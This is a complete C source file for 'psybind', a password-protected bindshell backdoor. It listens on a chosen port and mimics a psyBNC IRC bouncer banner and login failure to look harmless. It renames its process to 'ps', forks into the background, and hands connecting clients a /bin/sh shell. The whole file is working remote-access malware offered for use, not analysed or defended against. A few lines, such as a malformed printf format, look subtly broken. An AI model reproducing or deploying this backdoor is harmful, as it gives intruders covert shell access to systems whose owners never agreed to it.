/* * * * * * * * * * * * * * * * * *
 *
 * psybind.c - a portable bindshell
 *
 * usage:  ./psybind [port] [password]
 *
 * * * * *
 *
 * This simple bindshell, which pretends to be a psyBNC server,  allows
 * for easy customization without a recompile. Simply chose a port for the
 * bindshell and a password to login with.
 *
 * by John Martinelli
 *    john@martinelli.com
 *
 *    redlevel security
 *    redlevel.org
 *
 * * * * *
 *
 * April 23, 2006
 *
 */

#include <netinet/in.h>
#include      <stdio.h>
#include     <stdlib.h>
#include <sys/socket.h>
#include  <sys/types.h>
#include     <unistd.h>

struct sockaddr_in adr;
int in, out, side;

void spawn(char *passkey)
{
        // This is our psyBNC spoof banner

        char spacial[100];
        write(out, ":Welcome!psyBNC@lam3rz.de NOTICE * :psyBNC2.3.2-7\n", 50);
	read(out, spacial, sizeof(spacial));

        // Compare our buffer to our original password..

        if (!strncmp(spacial, passkey, strlen(passkey)))
        {
            dup2(out, 0); dup2(out, 1); dup2(out, 2);
            execl("/bin/sh", "/bin/sh", (char *)0);
            close(out);
            exit(0);
        }

        else
        {
                // Emulate a login failure in psyBNC
                write(out, "Login failed. Disconnecting.\n", 30);
                close(out); exit(0);
        }

        close(out);
        exit(0);

}

main(int argc, char **argv)
{
        memset(&adr, 0, sizeof(adr));

                if (argc != 3)
                {
                        printf("usage: %s [port] [password]\n", argv[0]);
                        exit(1);
                }

        long portar = strtol(argv[1], NULL, 0);

        if (portar>65535)
        {
                printf("[!] Sorry, your port must be <65535.\n");
                exit(1);
        }

        printf("[%] Binding to port %l...\n",portar);

        adr.sin_family=AF_INET;
        adr.sin_port=htons(portar);
        adr.sin_addr.s_addr=INADDR_ANY;

        strncpy(argv[0], "ps", strlen(argv[0]));

        printf("[$] Accepting connections...\n");
        in=socket(AF_INET, SOCK_STREAM, 0);
        bind(in, (struct sockaddr *)&adr, sizeof(adr));
        listen(in, 3);

        side = sizeof(adr);
        if (fork() != 0)
        {
            exit(0);
        }

        while (1)
        {
                out=accept(in, (struct sockaddr *)&adr, &side);
                if (fork() != 0) {
                    close(in);
                    spawn(argv[2]);
                }

                close(out);
         }

        return 1;
}